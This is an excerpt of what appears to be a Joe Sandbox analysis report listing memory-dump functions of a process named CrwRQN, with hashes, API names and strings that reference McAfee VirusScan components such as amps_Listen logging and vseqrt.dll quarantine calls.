                                    • Instruction ID: 5aef184856849f1d0e814b0a8e39d0e8e949ccad25035a2bf8530ae42cfb47ec
                                    • Opcode Fuzzy Hash: 2c0fe4c55243f33cdb34ec3615e3d347b9ce4ba35bb8967fdbcfce9d52a551a3
                                    • Instruction Fuzzy Hash: 5CB1CFF36086C482F7A6CE16B6083AABAA5F7597D4F240115FF4973AF4D779C8808B00
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000005.00000002.2727724784.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                    • Associated: 00000005.00000002.2727708710.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000005.00000002.2727744651.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000005.00000002.2727761462.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000005.00000002.2727781579.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_5_2_140000000_CrwRQN.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: -
                                    • API String ID: 0-2547889144
                                    • Opcode ID: d0b365294d50e82b05b46562bde9ad75935525663af60c2549490a2d68dcad7f
                                    • Instruction ID: 5cc8c865c9461daf8b0756d8ed2731e20d175c685145385c3f78aef56f479fea
                                    • Opcode Fuzzy Hash: d0b365294d50e82b05b46562bde9ad75935525663af60c2549490a2d68dcad7f
                                    • Instruction Fuzzy Hash: 5FB1A0F26087C486F772CF16B5043AABAA1F7997D4F240115FF5923AE4DBB9C9848B40
                                    APIs
                                    Memory Dump Source
                                    • Source File: 00000005.00000002.2727724784.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                    • Associated: 00000005.00000002.2727708710.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000005.00000002.2727744651.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000005.00000002.2727761462.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000005.00000002.2727781579.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_5_2_140000000_CrwRQN.jbxd
                                    Similarity
                                    • API ID: ExceptionFilterUnhandled
                                    • String ID:
                                    • API String ID: 3192549508-0
                                    • Opcode ID: 836f1dd34661b3a221f56dc19e791b08cc78d614d7e29c7f03eced68424ee8fe
                                    • Instruction ID: 6026514bbd401dabfdc0327cb8eb2cc9cc42ab70edfd582905dc0376ef34508b
                                    • Opcode Fuzzy Hash: 836f1dd34661b3a221f56dc19e791b08cc78d614d7e29c7f03eced68424ee8fe
                                    • Instruction Fuzzy Hash: 37B09260A61400D1D605AF22AC8538022A0775C340FC00410E20986130DA3C819A8700
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000005.00000002.2727724784.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                    • Associated: 00000005.00000002.2727708710.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000005.00000002.2727744651.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000005.00000002.2727761462.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000005.00000002.2727781579.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_5_2_140000000_CrwRQN.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: -
                                    • API String ID: 0-2547889144
                                    • Opcode ID: ac637b882370d0844742d876f6d50665fbc38b4c3acf89c25781960c99b4f2e0
                                    • Instruction ID: f0a9775499ae8e11c0cd3741dc570bab2f5201344a81d2c1a5008a9dc88a1dca
                                    • Opcode Fuzzy Hash: ac637b882370d0844742d876f6d50665fbc38b4c3acf89c25781960c99b4f2e0
                                    • Instruction Fuzzy Hash: 7E91D4F2A047C485FBB2CE16B6083AA7AE0B7597E4F141516FF49236F4DB79C9448B40
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000005.00000002.2727724784.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                    • Associated: 00000005.00000002.2727708710.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000005.00000002.2727744651.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000005.00000002.2727761462.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000005.00000002.2727781579.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_5_2_140000000_CrwRQN.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: -
                                    • API String ID: 0-2547889144
                                    • Opcode ID: ab76a755316d4a48554b78acaf832b3985bbd0abb48915d025235a6fa293112f
                                    • Instruction ID: 8f8310eeb878d4aa74977829efb49c2c7de80d27e4d4fb150cd5d5e4432a17d7
                                    • Opcode Fuzzy Hash: ab76a755316d4a48554b78acaf832b3985bbd0abb48915d025235a6fa293112f
                                    • Instruction Fuzzy Hash: 51818FB26087C485F7B2CE16B5083AA7AA0F7997D8F141116FF45636F4DB79C984CB40
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000005.00000002.2727724784.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                    • Associated: 00000005.00000002.2727708710.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000005.00000002.2727744651.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000005.00000002.2727761462.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000005.00000002.2727781579.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_5_2_140000000_CrwRQN.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: -
                                    • API String ID: 0-2547889144
                                    • Opcode ID: c4b1ae68995c86a4b6842fa045a9432b0b2524c7844d6ccb0434c0756f7f8cc7
                                    • Instruction ID: f8efd74c2ac63e8556513dce229926bc74ff59f5ae5890729ffd39c1599aad0a
                                    • Opcode Fuzzy Hash: c4b1ae68995c86a4b6842fa045a9432b0b2524c7844d6ccb0434c0756f7f8cc7
                                    • Instruction Fuzzy Hash: BE81B0F2608BC486F7A2CE16B5083AA7AA1F7587E4F140515FF59236F4DB79C984CB40
                                    Memory Dump Source
                                    • Source File: 00000005.00000002.2727724784.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                    • Associated: 00000005.00000002.2727708710.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000005.00000002.2727744651.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000005.00000002.2727761462.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000005.00000002.2727781579.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_5_2_140000000_CrwRQN.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 382482a43049451918361ff49eb8a1074a352d433c0d3f6017d26c5ae398af27
                                    • Instruction ID: 63b5043dbdffafa71f1ddaca105bc0afa02b2cba45448f866c4c658d1faf9303
                                    • Opcode Fuzzy Hash: 382482a43049451918361ff49eb8a1074a352d433c0d3f6017d26c5ae398af27
                                    • Instruction Fuzzy Hash: B031B0B262129045F317AF37F941FAE7652AB897E0F514626FF29477E2CA3C88028704
                                    Memory Dump Source
                                    • Source File: 00000005.00000002.2727724784.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                    • Associated: 00000005.00000002.2727708710.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000005.00000002.2727744651.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000005.00000002.2727761462.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000005.00000002.2727781579.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_5_2_140000000_CrwRQN.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: b2d421cb8e45ff6c5d0cd91ffb7c0551f31bf35597a99ffb978e455b190e8185
                                    • Instruction ID: b610fbdfd0d7c5655a75ac718b847164fa7f0802b4cc155a4829149d785d36e6
                                    • Opcode Fuzzy Hash: b2d421cb8e45ff6c5d0cd91ffb7c0551f31bf35597a99ffb978e455b190e8185
                                    • Instruction Fuzzy Hash: FE317EB262129445F717AF37B942BAE7652AB887F0F519716BF39077E2CA7C88018710
                                    Memory Dump Source
                                    • Source File: 00000005.00000002.2727724784.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                    • Associated: 00000005.00000002.2727708710.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000005.00000002.2727744651.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000005.00000002.2727761462.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000005.00000002.2727781579.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_5_2_140000000_CrwRQN.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: b1ae0088751324d3bee5442ce8c7f4399171e4b45f421078da355ce765193e83
                                    • Instruction ID: e0c281a5a51834f3cf9ef76d9d4ef001c4a7356b2a993cafd714ca14a0116626
                                    • Opcode Fuzzy Hash: b1ae0088751324d3bee5442ce8c7f4399171e4b45f421078da355ce765193e83
                                    • Instruction Fuzzy Hash: F831E472A1029056F31BAF77F881BDEB652A7C87E0F655629BB190B7E3CA3D84008700
                                    Memory Dump Source
                                    • Source File: 00000005.00000002.2727823859.00007FFE1A4C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE1A4C0000, based on PE: true
                                    • Associated: 00000005.00000002.2727798107.00007FFE1A4C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 00000005.00000002.2727917117.00007FFE1A4D2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 00000005.00000002.2727935928.00007FFE1A4DD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 00000005.00000002.2727952107.00007FFE1A4DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_5_2_7ffe1a4c0000_CrwRQN.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 7a5a5e3725c53a151926f610c9bfb798d223dd818db9d286110f1e1aff9ffe1d
                                    • Instruction ID: f40f561f14ba0a4ee9d7dff36292ec1da40be646fec1f062e2da121a283c9ab0
                                    • Opcode Fuzzy Hash: 7a5a5e3725c53a151926f610c9bfb798d223dd818db9d286110f1e1aff9ffe1d
                                    • Instruction Fuzzy Hash: E4F068B17196568ADBA48F29F443A3977D0E758794F9480BAD58D83B14DA3C90608F04

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 346 1400038d0-140003915 SetWaitableTimer 347 140003925-140003947 346->347 348 140003917-140003924 346->348 349 140003949-140003969 #4 347->349 350 140003970-14000397a 347->350 349->350 351 140003992-1400039d3 EnterCriticalSection LeaveCriticalSection WaitForMultipleObjects 350->351 352 14000397c-14000398d #4 350->352 353 140003d32 351->353 354 1400039d9-1400039f1 351->354 352->351 355 140003d35-140003d49 353->355 356 1400039f3-140003a04 #4 354->356 357 140003a09-140003a1a EnterCriticalSection 354->357 356->357 358 140003a67 357->358 359 140003a1c-140003a34 357->359 362 140003a6c-140003a8e LeaveCriticalSection 358->362 360 140003a36 359->360 361 140003a3e-140003a49 359->361 360->361 361->362 363 140003a4b-140003a65 SetEvent ResetEvent 361->363 364 140003ab4-140003abe 362->364 365 140003a90-140003aad #4 362->365 363->362 366 140003ae8-140003af9 364->366 367 140003ac0-140003ae1 #4 364->367 365->364 368 140003afb-140003b26 #4 366->368 369 140003b2d-140003b37 366->369 367->366 368->369 370 140003b61-140003b6b 369->370 371 140003b39-140003b5a #4 369->371 372 140003b6d-140003b98 #4 370->372 373 140003b9f-140003ba9 370->373 371->370 372->373 374 140003bab-140003bd6 #4 373->374 375 140003bdd-140003be7 373->375 374->375 376 140003be9-140003c14 #4 375->376 377 140003c1b-140003c25 375->377 376->377 378 140003c27-140003c48 #4 377->378 379 140003c4f-140003c59 377->379 378->379 380 140003c83-140003c8d 379->380 381 140003c5b-140003c7c #4 379->381 382 140003cb7-140003cc1 380->382 383 140003c8f-140003cb0 #4 380->383 381->380 384 140003cc3-140003ce4 #4 382->384 385 140003ceb-140003cf5 382->385 383->382 384->385 386 140003d11-140003d14 385->386 387 140003cf7-140003d0c #4 385->387 388 140003d17 call 140001750 386->388 387->386 389 140003d1c-140003d1f 388->389 390 140003d21-140003d29 call 140002650 389->390 391 140003d2e-140003d30 389->391 390->391 391->355
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000005.00000002.2727724784.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                    • Associated: 00000005.00000002.2727708710.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000005.00000002.2727744651.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000005.00000002.2727761462.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000005.00000002.2727781579.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_5_2_140000000_CrwRQN.jbxd
                                    Similarity
                                    • API ID: CriticalSection$EnterEventLeave$MultipleObjectsResetTimerWaitWaitable
                                    • String ID: amps_Listen: pHandle=%paction taken: %d$amps_Listen: pHandle=%pdetection accuracy: %d$amps_Listen: pHandle=%pdetection component type: %d$amps_Listen: pHandle=%pdetection message: %s$amps_Listen: pHandle=%pdetection name: %s$amps_Listen: pHandle=%pdetection type: %d$amps_Listen: pHandle=%peventId: %d$amps_Listen: pHandle=%pobject archive name: %s$amps_Listen: pHandle=%pobject name: %s$amps_Listen: pHandle=%pobject type: %d$amps_Listen: pHandle=%psession Id: %d$amps_Listen: pHandle=%p, message is:$amps_Listen: pHandle=%p, message received, pulling from AMP queue$amps_Listen: pHandle=%p, p=%p$amps_Listen: pHandle=%p, waiting for messages from the AMP queue$null
                                    • API String ID: 1021822269-3147033232
                                    • Opcode ID: e7e75cb521e949a2fcfed2942cb356f66ccf7465466a17c5606e033b0a8adf5e
                                    • Instruction ID: ec7db78c4d4a766f71db07ed68f83fdabe3b60d74f96cc88383eff92a0be527c
                                    • Opcode Fuzzy Hash: e7e75cb521e949a2fcfed2942cb356f66ccf7465466a17c5606e033b0a8adf5e
                                    • Instruction Fuzzy Hash: E5D1DAB5205A4592EB12CF17E880BD923A4F78CBE4F454122BB0D4BBB5DF7AD686C350

                                    Control-flow Graph

                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000005.00000002.2727724784.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                    • Associated: 00000005.00000002.2727708710.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000005.00000002.2727744651.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000005.00000002.2727761462.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000005.00000002.2727781579.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_5_2_140000000_CrwRQN.jbxd
                                    Similarity
                                    • API ID: AddressProc$Library$Free$CriticalInitializeLoadSection
                                    • String ID: MsiLocateComponentW$msi.dll$vseExec$vseGet$vseGlobalInit$vseGlobalRelease$vseInit$vseRelease$vseSet${7A7E8119-620E-4CEF-BD5F-F748D7B059DA}
                                    • API String ID: 883923345-381368982
                                    • Opcode ID: b9a27f811b976282af616144a97be757c2cf76aa1f8607743da558726ba8644d
                                    • Instruction ID: d19804ac2d128cc8e67db72781ea5cb7b7d89be94dae840b99a82102003c66a5
                                    • Opcode Fuzzy Hash: b9a27f811b976282af616144a97be757c2cf76aa1f8607743da558726ba8644d
                                    • Instruction Fuzzy Hash: F351EEB4221B4191EB52CF26F8987D823A0BB8D7C5F841515EA5E8B3B0EF7AC548C700
                                    APIs
                                    Memory Dump Source
                                    • Source File: 00000005.00000002.2727724784.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                    • Associated: 00000005.00000002.2727708710.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000005.00000002.2727744651.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000005.00000002.2727761462.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000005.00000002.2727781579.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_5_2_140000000_CrwRQN.jbxd
                                    Similarity
                                    • API ID: Heap$CriticalSection$FreeProcess$EnterEventLeave$CloseHandle$MultipleObjectsResetWait
                                    • String ID:
                                    • API String ID: 1613947383-0
                                    • Opcode ID: e9680c11c9d284b0c3aa37b35d301596d2d95dd61f06f1daf2196339e6fd89f5
                                    • Instruction ID: 4415f923c5b49a541c3c18af517eb333de188a5b32bf04682df7988820a44021
                                    • Opcode Fuzzy Hash: e9680c11c9d284b0c3aa37b35d301596d2d95dd61f06f1daf2196339e6fd89f5
                                    • Instruction Fuzzy Hash: 8D51D3BA204A4496E726DF23F85439A6361F79CBD1F044125EB9A07AB4DF39D599C300
                                    APIs
                                    Memory Dump Source
                                    • Source File: 00000005.00000002.2727724784.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                    • Associated: 00000005.00000002.2727708710.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000005.00000002.2727744651.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000005.00000002.2727761462.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000005.00000002.2727781579.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_5_2_140000000_CrwRQN.jbxd
                                    Similarity
                                    • API ID: Heap$CriticalSection$FreeProcess$CloseEnterEventHandleLeave$DeleteReset
                                    • String ID:
                                    • API String ID: 1995290849-0
                                    • Opcode ID: 50d905dbcd5d3d8e314177ba4d4162b1dc612bf36ecce00c392234b6cbb64ee5
                                    • Instruction ID: 07b3271e3c5f19e1ab061b13c36c38fadfaaa54878a955e19646b3fb384661b9
                                    • Opcode Fuzzy Hash: 50d905dbcd5d3d8e314177ba4d4162b1dc612bf36ecce00c392234b6cbb64ee5
                                    • Instruction Fuzzy Hash: 7C31D3B6601B41A7EB16DF63F98439833A4FB9CB81F484014EB4A07A35DF39E4B98304
                                    APIs
                                    Memory Dump Source
                                    • Source File: 00000005.00000002.2727724784.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                    • Associated: 00000005.00000002.2727708710.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000005.00000002.2727744651.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000005.00000002.2727761462.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000005.00000002.2727781579.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_5_2_140000000_CrwRQN.jbxd
                                    Similarity
                                    • API ID: Heap$CriticalSection$FreeProcess$CloseEnterEventHandleLeave$DeleteReset
                                    • String ID:
                                    • API String ID: 1995290849-0
                                    • Opcode ID: 2f4077f28f01d0b1ccc1c48d704ff51649a530c0da5e40bb1ca44111346c6a52
                                    • Instruction ID: fd5ea752b6625aace240e5dc115a6ac8a79eac1ae5096a798ed6b9a4de507a32
                                    • Opcode Fuzzy Hash: 2f4077f28f01d0b1ccc1c48d704ff51649a530c0da5e40bb1ca44111346c6a52
                                    • Instruction Fuzzy Hash: B2311BB4511E0985EB07DF63FC943D423A6BB5CBD5F8D0129AB4A8B270EF3A8499C214
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000005.00000002.2727724784.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                    • Associated: 00000005.00000002.2727708710.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000005.00000002.2727744651.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000005.00000002.2727761462.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000005.00000002.2727781579.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_5_2_140000000_CrwRQN.jbxd
                                    Similarity
                                    • API ID: CriticalSection$EnterLeave$CloseCreateValue
                                    • String ID: ?$SYSTEM\CurrentControlSet\Services\vseamps\Parameters$action
                                    • API String ID: 93015348-1041928032
                                    • Opcode ID: 29268dff0e12a6c2837206cbe8abbe1365c88675c14f20743fcf2bb12703bfc8
                                    • Instruction ID: 955b1bef443a43e40f7389cebc0d05d3cfed999bfec6c75915e9fb821c1678e4
                                    • Opcode Fuzzy Hash: 29268dff0e12a6c2837206cbe8abbe1365c88675c14f20743fcf2bb12703bfc8
                                    • Instruction Fuzzy Hash: E3714676211A4082E762CB26F8507DA73A5F78D7E4F141226FB6A4B7F4DB3AC485C700
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000005.00000002.2727724784.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                    • Associated: 00000005.00000002.2727708710.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000005.00000002.2727744651.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000005.00000002.2727761462.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000005.00000002.2727781579.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_5_2_140000000_CrwRQN.jbxd
                                    Similarity
                                    • API ID: CriticalSection$AddressProc$EnterLeave$LibraryLoad
                                    • String ID: vseqrt.dll$vseqrtAdd$vseqrtInit$vseqrtRelease
                                    • API String ID: 3682727354-300733478
                                    • Opcode ID: a0032026953fb9b355f8eab640deda5175e427bf7f4d2824b31ceb49df98d19c
                                    • Instruction ID: 5756194132ff8dd7ec1522ad033bffa79c37130547d86cec9d6c1639cfe77c95
                                    • Opcode Fuzzy Hash: a0032026953fb9b355f8eab640deda5175e427bf7f4d2824b31ceb49df98d19c
                                    • Instruction Fuzzy Hash: 8C710175220B4186EB52DF26F894BC533A4F78CBE4F441226EA598B3B4DF3AC945C740
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000005.00000002.2727724784.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                    • Associated: 00000005.00000002.2727708710.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000005.00000002.2727744651.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000005.00000002.2727761462.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000005.00000002.2727781579.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_5_2_140000000_CrwRQN.jbxd
                                    Similarity
                                    • API ID: Heap$CriticalSection$AllocLeaveProcess$EnterTimerWaitable
                                    • String ID: amps_Init: done, pHandle=%p$amps_Init: iFlags=%d, pid=%d, sid=%d
                                    • API String ID: 2587151837-1427723692
                                    • Opcode ID: 056e3220293f8a27eada56f59a4c806f255f255991a422811975143a91f7a127
                                    • Instruction ID: a7c4065e0455d4df5ce4727384a6dec66c16779501c9bb3b2af2b379a082be6c
                                    • Opcode Fuzzy Hash: 056e3220293f8a27eada56f59a4c806f255f255991a422811975143a91f7a127
                                    • Instruction Fuzzy Hash: 9F5114B5225B4082FB13CB27F8847D963A5F78CBD0F445525BB4A4B7B8DB7AC4448700
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000005.00000002.2727724784.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                    • Associated: 00000005.00000002.2727708710.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000005.00000002.2727744651.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000005.00000002.2727761462.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000005.00000002.2727781579.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_5_2_140000000_CrwRQN.jbxd
                                    Similarity
                                    • API ID: CurrentDirectory$LibraryLoad$AddressAttributesFileHandleModuleProc
                                    • String ID: SetDllDirectoryW$kernel32.dll
                                    • API String ID: 3184163350-3826188083
                                    • Opcode ID: 09225629eee72228c5d7f95fa2eee3f64651a4a6406a600936b89273ecb07b9f
                                    • Instruction ID: 3ea874f08b0d6ae9fbaedd0e680489d05007b391355801732f4c7fbd06edc96d
                                    • Opcode Fuzzy Hash: 09225629eee72228c5d7f95fa2eee3f64651a4a6406a600936b89273ecb07b9f
                                    • Instruction Fuzzy Hash: FD41F6B1218A8582EB22DF12F8547DA73A5F79D7D4F400125EB8A0BAB5DF7EC548CB40
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000005.00000002.2727724784.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                    • Associated: 00000005.00000002.2727708710.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000005.00000002.2727744651.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000005.00000002.2727761462.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000005.00000002.2727781579.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_5_2_140000000_CrwRQN.jbxd
                                    Similarity
                                    • API ID: Heap$AllocProcesslstrlen
                                    • String ID: Security=impersonation static true$ampIfEp$ncalrpc
                                    • API String ID: 3424473247-996641649
                                    • Opcode ID: 1d37d06b5998b82bc2dc7011aec07efaf1f4b1bb41d2d67d0687b588f1a55b3d
                                    • Instruction ID: 5475aedf582102907cd33adbfaf34f9b11ebc9e91273ce6565e0ea0cfbbdf015
                                    • Opcode Fuzzy Hash: 1d37d06b5998b82bc2dc7011aec07efaf1f4b1bb41d2d67d0687b588f1a55b3d
                                    • Instruction Fuzzy Hash: FE3137B062A74082FB03CB53BD447E962A5E75DBD8F554019EB0E0BBB6DBBEC1558700
                                    APIs
                                    Memory Dump Source
                                    • Source File: 00000005.00000002.2727724784.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                    • Associated: 00000005.00000002.2727708710.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000005.00000002.2727744651.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000005.00000002.2727761462.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000005.00000002.2727781579.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_5_2_140000000_CrwRQN.jbxd
                                    Similarity
                                    • API ID: String$ByteCharMultiWide$ErrorLast
                                    • String ID:
                                    • API String ID: 1775797328-0
                                    • Opcode ID: 802883c3254266504f9bffab4fe863b98e9923c524f0017741f2ad98f2b9a469
                                    • Instruction ID: 7820e0e177e3580e7fbac086e7e180635334a87404cd07a7d6eea56579f34d7e
                                    • Opcode Fuzzy Hash: 802883c3254266504f9bffab4fe863b98e9923c524f0017741f2ad98f2b9a469
                                    • Instruction Fuzzy Hash: 7CE18BB27007808AEB66DF26A54079977E1F74EBE8F144225FB6957BE8DB38C941C700
                                    APIs
                                    • GetEnvironmentStringsW.KERNEL32(?,?,?,?,?,0000000140005C67), ref: 0000000140009C52
